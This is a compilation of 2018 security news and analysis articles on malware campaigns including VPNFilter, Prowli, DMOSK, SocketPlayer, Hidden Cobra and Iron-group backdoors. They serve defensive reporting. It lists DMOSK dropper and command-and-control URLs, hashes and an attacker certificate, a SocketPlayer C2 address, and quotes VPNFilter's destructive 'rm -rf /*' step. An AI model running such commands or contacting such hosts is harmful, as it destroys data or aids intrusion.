Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.
This means, even after the FBI seized the key C&C server of VPNFilter, hundreds of thousands of devices already infected with the malware, likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. For this, router owners are advised to contact their manufacturer.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy is more than worth a router's price.
Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.2018 thehackernews IoT Virus
After the discovery of massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques including use of exploits, password brute-forcing and abusing weak configurations.
Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.
Here's the list devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Thing (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner
Since the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, researchers believe they are more focused on making money rather than ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.
In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
Attackers Also Tricks Users Into Installing Malicious Extensions
Besides cryptocurrency miner, attackers are also using a well known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing attackers to redirect visitors of websites to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard to secure systems, in order to separate them from the rest of their network.
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.
DMOSK Malware Targeting Italian Companies
8.6.2018 securityaffairs Virus
The security expert and malware researcher Marco Ramilli published a detailed analysis on a new strain of malware dubbed DMOSK that targets Italian firms,
Today I’d like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analyzed stage (yes, we know the companies who might be infected). Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they’ve got alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that ?!). The eMail we’ve got had the following body.
Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the “calling” email address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse. The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.
Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it’s interesting to observe that only one dropping URL was called. It’s a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.
Third Stage: Executable SCR file
Unfortunately, we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim’s memory
Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.
Temporary File Before Sending data to Command and Control
Like any other ursnif the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.
An interesting approach that was adopted by attackers is the blacklisting. We observed at least 3 blacklists. The first one was based on victims IP. We guess (but we have not evidence on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.
Temporary File Storing IP Victim IP Address
A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
geo (Out of geographical scope). The threat is mainly focused to hit italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn’t it ?
A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance to be analyzed, in fact, the blacklisted IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.
Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it …. let’s say… for respect to the attacker (? really ?)
Attacker Private Key !
While the used public certificate is the following one:
Attacker Certificate
By decoding the fake certificate the analyst would take the following information, of course, none of these information would be valuable, but make a nice shake of analysis.
Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16
Maybe the most “original string”, by the meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string ‘dmosk’ (in the decoded certificate), from here the Malware name.
As today we observed: 6617 email addresses that potentially could be compromised since they clicked on the First stage (evidence on dropping URL). We have evidence that many organisations have been hit by this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the “probably infected” companies. Nation Wide CERTs have been alerted (June 7 2018) and together we will contact the “probably infected” companies to help them to mitigate the threat.
Please update your rules, signature and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.
IoC:
Dropurl:
https:// drive[.carlsongracieanaheim[.com/doc.php
https:// drive[.carlsongracieanaheim[.com/doc1.php
https:// drive[.carlsongracieanaheim[.com/x/gate.php
https:// drive[.carlsongracieanaheim[.com/1/gate.php
C2 (tor):
https:// 4fsq3wnmms6xqybt[.onion/wpapi
https:// em2eddryi6ptkcnh[.onion/wpapi
https:// nap7zb4gtnzwmxsv[.onion/wpapi
https:// t7yz3cihrrzalznq[.onion/wpapi
C2:
https:// loop.evama.[at/wpapi
https:// torafy[.cn/wpapi
https:// u55.evama[.at/wpapi
https:// yraco[.cn/wpapi
https:// inc.robatop.[at/wpapi
https:// poi.robatop.[at/wpapi
https:// arh.mobipot.[at/wpapi
https:// bbb.mobipot.[at/wpapi
https:// takhak.[at/wpapi
https:// kerions.[at/wpapi
https:// j11.evama[.at/wpapi
https:// clocktop[.at/wpapi
https:// harent.[cn/wpapi
Hash:
067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe
Cert:
-----BEGIN CERTIFICATE-----
MIID3zCCAsegAwIBAgIJAK4RHChf5QoWMA0GCSqGSIb3DQEBCwUAMIGFMQswCQYD
VQQGEwJSVTEMMAoGA1UECAwDU1BiMQwwCgYDVQQHDANTUGIxGDAWBgNVBAoMD0ds
b2JhbCBTZWN1cml0eTEWMBQGA1UECwwNSVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQ
dGVzdC5kbW9zay5sb2NhbDENMAsGA1UEAwwEdGVzdDAeFw0xODA2MDUxNTIyMjBa
Fw0yMjA2MDUxNTIyMjBaMIGFMQswCQYDVQQGEwJSVTEMMAoGA1UECAwDU1BiMQww
CgYDVQQHDANTUGIxGDAWBgNVBAoMD0dsb2JhbCBTZWN1cml0eTEWMBQGA1UECwwN
SVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQdGVzdC5kbW9zay5sb2NhbDENMAsGA1UE
AwwEdGVzdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMua+rsContr
RIvQHX/M2qE4H30dIaLpYUqKll3GaZl8nkSxDAtyytfkMxiMeyn6tg2wy1M8RgGN
7dqtQwUJHfRdiaebmliKMPJHBn3SOhTd/caf7v552C85AQuOKZMWgaJ/3gQodmgI
Tr7p8q7g2OWg4nE0nGXXasFZYVEU3S81Z0wxNriRD9geNfkamv8fi0hm8HzDnLdi
bjvbTAsqTdegkkk/41ssXttckQRhRpgIzqRJ+sappdu4FzTuxOVA4jSRgZokD1l2
QFr4YTEJSUz4QHDGbow3nLvqTEHpvG90tgr+AHcR31otPiI1wm6bTj6IdicFENfC
4+5aIkvm72cCAwEAAaNQME4wHQYDVR0OBBYEFBIc9X32dzRzR9T1pmrmdZtshmJ9
MB8GA1UdIwQYMBaAFBIc9X32dzRzR9T1pmrmdZtshmJ9MAwGA1UdEwQFMAMBAf8w
DQYJKoZIhvcNAQELBQADggEBAE8AE11sWLICXcBO64iYByM96ZSWWN1JYGRaFWJ8
l8J1BiQNxh5N31X1HBs/sc87CPuqBB8CKxukoYU1T54HZQYmb3NHdc3JLFH2ah/o
028TSCXy16uvGGcxMhNcoZUCjWQHJzbXbVvPjkKjkJ1RR8DV1hRMcYLfO6LtSjAd
h7VnPVBNffGC/n9eTQjvwOR+dRN1IFLzwmpnwqVcxxjJM3+2OExfWBzKQ08/7MK/
xM8X8cmAb11Oyg7RXnE7X9Cfygy/Rz2fDGv4K7N8YDdL5osnyrN5fG8L2GG+srJ2
wdFYILlV+eLyfhwr6Oor5Z4zPgvcLLKbpHxQBvdkEdqX5F0=
VPNFilter Targets More Devices Than Initially Thought
7.6.2018 securityweek Virus
Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.
Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.
Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.
The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.
“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.
Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.
One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.
When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.
The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.
Backdoor Uses Socket.io for Bi-directional Communication
7.6.2018 securityweek Virus
A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.
Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.
Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.
G Data security researchers observed two variants of SocketPlayer in the wild, one acting as a downloader capable of executing arbitrary code from a website, while the other featuring more complex capabilities, including detection and sandbox evasion mechanisms.
Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.
The researchers also discovered that other functions are also selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.
The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.
The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).
The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.
The invoked program creates a socket connection to the host hxxp://93.104.208.17:5156/socket.io, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”
It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.
The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.
FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.2018 thehackernews Virus
The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one.
Joanap—A Remote Access Trojan
According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script."
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.
VPNFilter malware now targets new devices, even behind a firewall
7.6.2018 securityaffairs Virus
The VPNFilter botnet now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The VPNFilter botnet is worse than initially thought, according to a new report published by Cisco Talos Intelligence group, the malicious code is now targeting ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE
“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.
“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”
VPNFilter bot is now able to target endpoints behind the firewall and other network devices using a new stage 3 module that injects malicious content into web traffic
The recently discovered module dubbed “ssler” could be exploited by attackers to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge).
“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.
VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but fortunately, a prompt action of authorities allowed to take down it.
A week ago, experts from security firms GreyNoise Intelligence and JASK announced that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.
Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected, this means that the botnet could rapidly grow to infect new consumer or SOHO devices.
Talos already notified the attacks to the vendors, most of them promptly started working on new firmware to address the issue.
According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.
“The initial list of targeted routers included MicroTik, Linksys, NetGear, and TPLink. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.” reads a post published by Juniper Network.
“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”
The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.
The experts noticed that one of the parameters provided to the module it the source IP, a circumstance that suggests attackers might be profiling endpoints to pick out the best targets. The module is also able to monitor destination IP, likely to choose profitable targets, such as connection to a bank, or connections on which are credentials and other sensitive data are in transit.
The experts also provided further details on the device destruction module ‘dstr’ that attackers could use to render an infected device inoperable.
The dstr module is able to delete files necessary for normal operation of the infected device, it also deletes all files and folders related to its own operation to hide its presence to a forensic analysis.
“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.” continues the analysis.
The following table published by El Reg shows all devices targeted by the VPNFilter bot, new ones are marked with an asterisk.
VENDOR DEVICE / SERIES
ASUS RT-AC66U*; RT-N10 series*, RT-N56 series*
D-Link DES-1210-08P*; DIR-300 Series*; DSR-250, 500, and 1000 series*
Huawei HG8245*
Linksys E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
Microtik CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear DG834*; DGN series*; FVS318N*; MBRN3000*; R-series; WNR series*; WND series*; UTM50*
QNAP TS251; TS439 Pro; other devices running QTS software
TP-Link R600VPN; TL-WR series*
Ubiquiti NSM2*; PBE M5*
UPVEL Unknown devices
ZTE ZXHN H108N*
Further technical details are available in the report published by Talos.
VPNFilter Continues Targeting Routers in Ukraine
6.6.2018 securityweek Virus
Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.
When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.
The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.
During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.
Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.
However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.
While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.
Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.
“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.
The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.
The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.
The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.
New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.2018 securityweek Virus
A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.
The Iron group is known for the Iron ransomware (which a rip-off Maktub malware) and is believed to have been active for around 18 months.
During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.
Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.
During installation, it checks if it runs in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks OS version and launches the backdoor based on the platform iteration.
The malware also checks if Qhioo360 products are present on the systems and only proceeds if none is found. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.
Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.
These include a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which targets Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (dynamically calls external library function by obfuscating the function name, thus making static analysis more difficult).
The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.
The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.
The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.
If Qhioo360 Safe Guard or Internet Security are found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.
The malware would decrypt a shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin paste address.
Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.
The Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets (it targets around 20 wallets).
“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.
Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.2018 securityaffairs Virus
Security experts at security firm Intezer have recently discovered backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by the HackingTeam, it was considered a powerful malware that is able to infect also mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype), the mobile version, available for all the OSs (Apple, Android, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and GPS module.
The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.
“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.
“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”
Thousands of victims have been infected by malware used by the crime gang.
The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.
The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.
The malware halts its execution if detect the presence of Qhioo360 products. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.
The analysis of the backdoor revealed it uses two main functions in their IronStealer and Iron ransomware families, the VM detection code that was borrowed from the HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.
The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.
The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.
“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.
The backdoor also includes Adblock Plus for IE that is capable of injecting remote JavaScript, a functionality, however, is no longer automatically used.
The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.
The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.
The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.
“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.
Further details, including the IoCs are reported in the blog post published by the researchers.
Imperva’s research shows 75% of open Redis servers are infected
3.6.2018 securityaffairs Virus
According to the security experts at Imperva firm, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for some months.
Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.
One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.
“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/ or values to carry out attacks.” states the report published by the experts.
“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”
The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.
The experts obtained a list of over 72,000 Redis servers available online by using the shodan query ‘port:6379,’ over 10,000 of these responded to its scan request without an error, allowing researchers to determine locally installed SSH keys.
The discovery was disconcerting, over 75% of these Redis servers were using an SSH key associated with a botnet.
